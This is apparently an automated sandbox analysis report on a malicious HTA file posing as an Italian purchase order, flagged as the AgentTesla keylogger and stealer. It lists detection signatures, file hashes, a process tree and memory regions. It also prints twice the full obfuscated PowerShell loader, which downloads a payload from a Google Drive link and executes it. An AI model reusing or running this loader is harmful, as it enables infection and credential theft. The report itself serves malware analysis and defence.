Overview

overview

10

Static

static

1

ORDINE N°...24.hta

windows7-x64

10

ORDINE N°...24.hta

windows10-2004-x64

10

Analysis

  • max time kernel
    144s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-05-2024 09:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ORDINE N°61 DATA 23-05-2024.hta

  • Size

    65KB

  • MD5

    0d8f6caf211e28d1eb138915e5749c64

  • SHA1

    9ec692b04ba1c49c29d7a3d3aacf1ad658fd38bb

  • SHA256

    a95a24749926634be6d8ad223cc9c05fc42dc66261fe00e00deb4a357bc8e059

  • SHA512

    fad024848234be462ae19e5497adb93c017cf0f0bec6fdcc2e1181646f5adc739df814a25aa1ecd388c4c694711de3222d4fe1c4f6837f53b8844052168e4d22

  • SSDEEP

    96:5UlJjhvtpW0iVIW/M7jTZYr8wDehJQQ43VJ2KOwbo2fSjCu0GURfk:elJNlbCwX43TOwbo2yCnGURf

Score
10/10
agentteslakeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\ORDINE N°61 DATA 23-05-2024.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1724
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Exsiccative='Sub';$Exsiccative+='strin';$Bijouterierne = 1;$Exsiccative+='g';Function grubbing($Skriger){$Sibships=$Skriger.Length-$Bijouterierne;For($Supermodern=1;$Supermodern -lt $Sibships;$Supermodern+=2){$Iodising+=$Skriger.$Exsiccative.Invoke( $Supermodern, $Bijouterierne);}$Iodising;}function Specialkredse($Trucing){ & ($Kdebrkens) ($Trucing);}$Valleyful=grubbing 'OMFo z i l lTa /R5S..0H A( WTi nAdVoOw s TNnTR V1 0I.,0 ;E SW,i,n 6 4R;E .x 6G4P;Z VrFva:U1F2 1B.O0M), EG e.cSkSo./M2T0B1V0 0 1 0 1. SF,i r eEf oSx /R1F2.1C. 0 ';$Counterdemonstrator=grubbing 'DULsJeEru-NA,g e,n.tA ';$Lifte=grubbing 'Hh,tStSpOs,: /o/Td rLi,vSe,.,gFoNo.g l.eA. c oSmS/Au,cA?.e xAp o rCt.=.dpoPwTn.l oCaMd &.iVdf= 1BdL3p5.i.Q.7._ -Uj.pPmBySyEqLCSUFj,S dIPRf,RM0,xBd w.dtBFVGmSG D ';$Bashawdom=grubbing ' >F ';$Kdebrkens=grubbing 'Bi eBx, ';$Poltergeist='Braked';$Sundhedsmssige = grubbing ' eNc h oC %Ea pSpSdSa t aA%.\.UKn.dclDb nIe sO.LBPrRo .&E& e c h,oU t ';Specialkredse (grubbing 'C$.gKl o b.a l,:DY,oSyFoAeOrRsa= (ScSmLd. P/ cI .$IS uRn.dShTeGdFsSmSs sMi gDe.)K ');Specialkredse (grubbing ' $RgSlUo b a,lG:AK.oAnBs t aSn tKe rVk,lLrCiTn gUe rBnJe,= $.L.i f t,e.. s,p lCiRt.(C$ BSa.ssh,a wsd o mE)J ');$Lifte=$Konstanterklringerne[0];$Dynelfterparagraf= (grubbing 'C$ g lTo bdaUlR: C l i n.o,cSe pShRa lDo,u,sA= NFeSw -KO.b.jSe.c.t SS,yRs.tse.mR..NRe t .UW eab Cjl iTeBn t');$Dynelfterparagraf+=$Yoyoers[1];Specialkredse ($Dynelfterparagraf);Specialkredse (grubbing 'I$PCMl iMnSo.c e.p h.aIl o u.s . HPeaa dDePrLsP[.$,CSo.uSn t e r d eEmBoInEsBtPr.a,tLo re] = $ VCa l l eSyifPuLlH ');$Duppeditternes=grubbing 'I$LC l iBn oJcPe,pGhAaGl o u sn.FDDoPwpnAlcoBaSdEFSi.lMe ( $,L i fStFe ,,$SL iRlSlCesm,o rK5U1,). ';$Lillemor51=$Yoyoers[0];Specialkredse (grubbing ' $Pg l oEb.aSl : U,dbsPo,n.dPrKe rS= (JTNeCs tF-TPMa tKhU ,$ L.i l,lSe mBoIr 5 1.)g ');while (!$Udsondrer) {Specialkredse (grubbing ',$Sg lIo,b a l,:FLIe d.nRi,nSgPsAnEe.tEt.eSn e.= $ tJr.u e ') ;Specialkredse $Duppeditternes;Specialkredse (grubbing ' S t aSrCtI- SPlIe.eLp. .4O ');Specialkredse (grubbing 'R$WgAlFoKbGa,lG: URdUsFoRn d.r eNrO=,(.T.ePsSt -.P.aDt.h ,$ LEi,lGl epmbo rS5N1 )r ') ;Specialkredse (grubbing 'T$Mg l.o.bEa la:UU.nEi v.eKr sMi t.e.tHsblOe k,t o,rIe rSnLeSsS= $CgSlMoSb aAll:RF r eLm k,o.mSm.eSnTd eC+F+ %M$AKToDn s,t aFnEt eTrVkUlRrBiCnSgGeDrKn,eC.FcRo uVn t ') ;$Lifte=$Konstanterklringerne[$Universitetslektorernes];}$Northernizes=358064;$Religionsfrihedens=26752;Specialkredse (grubbing 'P$ gFluo b.a lF: THu r b iBn aEt,i oKn, P= KGTe t.-SCUoOnAtUe.n t. S$FLMiSlWlOeGm o.rI5.1 ');Specialkredse (grubbing 'I$.g lLo.b a.lB:SNSuAn E=S .[,SUy s tBe mB.AC oHn,v.eWr.t.].:,:NF.rtoMmAB a,s e,6U4.S,t,r,i nTgS( $ITAu rvb iCn,a tEiFo nL) ');Specialkredse (grubbing 'K$,gGl oGb aDl :.A s sIa sFs ihnU = ,[ S y shtIeFm .dT,e xAt.. Edn c oLdHi nTg ],: : A SMC ISI,.CGDeUt.S,t rSiRn.g.(S$CN uPnS) ');Specialkredse (grubbing 'D$Mg l o b.a.lL:.R,a aCeen eLrSg iSe nP= $ ADsFs,aRs s i.nN.UsAu,b s,t,rGiRn.g (.$ NooarSt,hSeCrTnKiPzTe sS,M$,R e.lPiNg iSo.n sOf rciEh e,dMe.nTsg), ');Specialkredse $Raaenergien;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3988
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Undlbnes.Bro && echo t"
        3⤵
          PID:1476
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Exsiccative='Sub';$Exsiccative+='strin';$Bijouterierne = 1;$Exsiccative+='g';Function grubbing($Skriger){$Sibships=$Skriger.Length-$Bijouterierne;For($Supermodern=1;$Supermodern -lt $Sibships;$Supermodern+=2){$Iodising+=$Skriger.$Exsiccative.Invoke( $Supermodern, $Bijouterierne);}$Iodising;}function Specialkredse($Trucing){ & ($Kdebrkens) ($Trucing);}$Valleyful=grubbing 'OMFo z i l lTa /R5S..0H A( WTi nAdVoOw s TNnTR V1 0I.,0 ;E SW,i,n 6 4R;E .x 6G4P;Z VrFva:U1F2 1B.O0M), EG e.cSkSo./M2T0B1V0 0 1 0 1. SF,i r eEf oSx /R1F2.1C. 0 ';$Counterdemonstrator=grubbing 'DULsJeEru-NA,g e,n.tA ';$Lifte=grubbing 'Hh,tStSpOs,: /o/Td rLi,vSe,.,gFoNo.g l.eA. c oSmS/Au,cA?.e xAp o rCt.=.dpoPwTn.l oCaMd &.iVdf= 1BdL3p5.i.Q.7._ -Uj.pPmBySyEqLCSUFj,S dIPRf,RM0,xBd w.dtBFVGmSG D ';$Bashawdom=grubbing ' >F ';$Kdebrkens=grubbing 'Bi eBx, ';$Poltergeist='Braked';$Sundhedsmssige = grubbing ' eNc h oC %Ea pSpSdSa t aA%.\.UKn.dclDb nIe sO.LBPrRo .&E& e c h,oU t ';Specialkredse (grubbing 'C$.gKl o b.a l,:DY,oSyFoAeOrRsa= (ScSmLd. P/ cI .$IS uRn.dShTeGdFsSmSs sMi gDe.)K ');Specialkredse (grubbing ' $RgSlUo b a,lG:AK.oAnBs t aSn tKe rVk,lLrCiTn gUe rBnJe,= $.L.i f t,e.. s,p lCiRt.(C$ BSa.ssh,a wsd o mE)J ');$Lifte=$Konstanterklringerne[0];$Dynelfterparagraf= (grubbing 'C$ g lTo bdaUlR: C l i n.o,cSe pShRa lDo,u,sA= NFeSw -KO.b.jSe.c.t SS,yRs.tse.mR..NRe t .UW eab Cjl iTeBn t');$Dynelfterparagraf+=$Yoyoers[1];Specialkredse ($Dynelfterparagraf);Specialkredse (grubbing 'I$PCMl iMnSo.c e.p h.aIl o u.s . HPeaa dDePrLsP[.$,CSo.uSn t e r d eEmBoInEsBtPr.a,tLo re] = $ VCa l l eSyifPuLlH ');$Duppeditternes=grubbing 'I$LC l iBn oJcPe,pGhAaGl o u sn.FDDoPwpnAlcoBaSdEFSi.lMe ( $,L i fStFe ,,$SL iRlSlCesm,o rK5U1,). ';$Lillemor51=$Yoyoers[0];Specialkredse (grubbing ' $Pg l oEb.aSl : U,dbsPo,n.dPrKe rS= (JTNeCs tF-TPMa tKhU ,$ L.i l,lSe mBoIr 5 1.)g ');while (!$Udsondrer) {Specialkredse (grubbing ',$Sg lIo,b a l,:FLIe d.nRi,nSgPsAnEe.tEt.eSn e.= $ tJr.u e ') ;Specialkredse $Duppeditternes;Specialkredse (grubbing ' S t aSrCtI- SPlIe.eLp. .4O ');Specialkredse (grubbing 'R$WgAlFoKbGa,lG: URdUsFoRn d.r eNrO=,(.T.ePsSt -.P.aDt.h ,$ LEi,lGl epmbo rS5N1 )r ') ;Specialkredse (grubbing 'T$Mg l.o.bEa la:UU.nEi v.eKr sMi t.e.tHsblOe k,t o,rIe rSnLeSsS= $CgSlMoSb aAll:RF r eLm k,o.mSm.eSnTd eC+F+ %M$AKToDn s,t aFnEt eTrVkUlRrBiCnSgGeDrKn,eC.FcRo uVn t ') ;$Lifte=$Konstanterklringerne[$Universitetslektorernes];}$Northernizes=358064;$Religionsfrihedens=26752;Specialkredse (grubbing 'P$ gFluo b.a lF: THu r b iBn aEt,i oKn, P= KGTe t.-SCUoOnAtUe.n t. S$FLMiSlWlOeGm o.rI5.1 ');Specialkredse (grubbing 'I$.g lLo.b a.lB:SNSuAn E=S .[,SUy s tBe mB.AC oHn,v.eWr.t.].:,:NF.rtoMmAB a,s e,6U4.S,t,r,i nTgS( $ITAu rvb iCn,a tEiFo nL) ');Specialkredse (grubbing 'K$,gGl oGb aDl :.A s sIa sFs ihnU = ,[ S y shtIeFm .dT,e xAt.. Edn c oLdHi nTg ],: : A SMC ISI,.CGDeUt.S,t rSiRn.g.(S$CN uPnS) ');Specialkredse (grubbing 'D$Mg l o b.a.lL:.R,a aCeen eLrSg iSe nP= $ ADsFs,aRs s i.nN.UsAu,b s,t,rGiRn.g (.$ NooarSt,hSeCrTnKiPzTe sS,M$,R e.lPiNg iSo.n sOf rciEh e,dMe.nTsg), ');Specialkredse $Raaenergien;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2656
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Undlbnes.Bro && echo t"
            4⤵
              PID:3552
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4584

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
        Filesize

        53KB

        MD5

        d4d8cef58818612769a698c291ca3b37

        SHA1

        54e0a6e0c08723157829cea009ec4fe30bea5c50

        SHA256

        98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

        SHA512

        f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uffecbab.mh3.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Undlbnes.Bro
        Filesize

        501KB

        MD5

        cfe9b8c61a6c2f4b5019dee39d211d9b

        SHA1

        21502ce83fe643474d2d4812cc2e9a03a3fde557

        SHA256

        ecd22c9bcd82803450c782a66463bbb6d57f791343583a61f99395e0c2473fb9

        SHA512

        0898931523b291d86f5a2d6f8544b10b398b785400781d5369475b5466d08f9ef0cd8fb572bb7eff4bd9d1ace627b723d22fb203c510657bc110e3736882efc1

        Download Submit

      • memory/2656-37-0x00000000092E0000-0x000000000A681000-memory.dmp

        Filesize

        19.6MB

        Download

      • memory/3988-40-0x00000000707C0000-0x0000000070F70000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3988-2-0x0000000004DB0000-0x00000000053D8000-memory.dmp

        Filesize

        6.2MB

        Download

      • memory/3988-7-0x0000000005570000-0x00000000055D6000-memory.dmp

        Filesize

        408KB

        Download

      • memory/3988-0-0x00000000707CE000-0x00000000707CF000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3988-6-0x0000000005500000-0x0000000005566000-memory.dmp

        Filesize

        408KB

        Download

      • memory/3988-17-0x00000000055E0000-0x0000000005934000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/3988-18-0x0000000005BD0000-0x0000000005BEE000-memory.dmp

        Filesize

        120KB

        Download

      • memory/3988-19-0x0000000005C70000-0x0000000005CBC000-memory.dmp

        Filesize

        304KB

        Download

      • memory/3988-20-0x0000000007220000-0x000000000789A000-memory.dmp

        Filesize

        6.5MB

        Download

      • memory/3988-3-0x00000000707C0000-0x0000000070F70000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3988-22-0x0000000006CA0000-0x0000000006D36000-memory.dmp

        Filesize

        600KB

        Download

      • memory/3988-59-0x00000000707C0000-0x0000000070F70000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3988-21-0x00000000061A0000-0x00000000061BA000-memory.dmp

        Filesize

        104KB

        Download

      • memory/3988-4-0x00000000707C0000-0x0000000070F70000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/3988-24-0x0000000007E50000-0x00000000083F4000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/3988-39-0x00000000707CE000-0x00000000707CF000-memory.dmp

        Filesize

        4KB

        Download

      • memory/3988-5-0x00000000053E0000-0x0000000005402000-memory.dmp

        Filesize

        136KB

        Download

      • memory/3988-1-0x00000000022D0000-0x0000000002306000-memory.dmp

        Filesize

        216KB

        Download

      • memory/3988-23-0x0000000006C30000-0x0000000006C52000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4584-56-0x0000000000E00000-0x0000000000E42000-memory.dmp

        Filesize

        264KB

        Download

      • memory/4584-60-0x0000000021EA0000-0x0000000021EF0000-memory.dmp

        Filesize

        320KB

        Download

      • memory/4584-55-0x0000000000E00000-0x0000000002054000-memory.dmp

        Filesize

        18.3MB

        Download

      • memory/4584-61-0x0000000021F90000-0x0000000022022000-memory.dmp

        Filesize

        584KB

        Download

      • memory/4584-62-0x00000000218E0000-0x00000000218EA000-memory.dmp

        Filesize

        40KB

        Download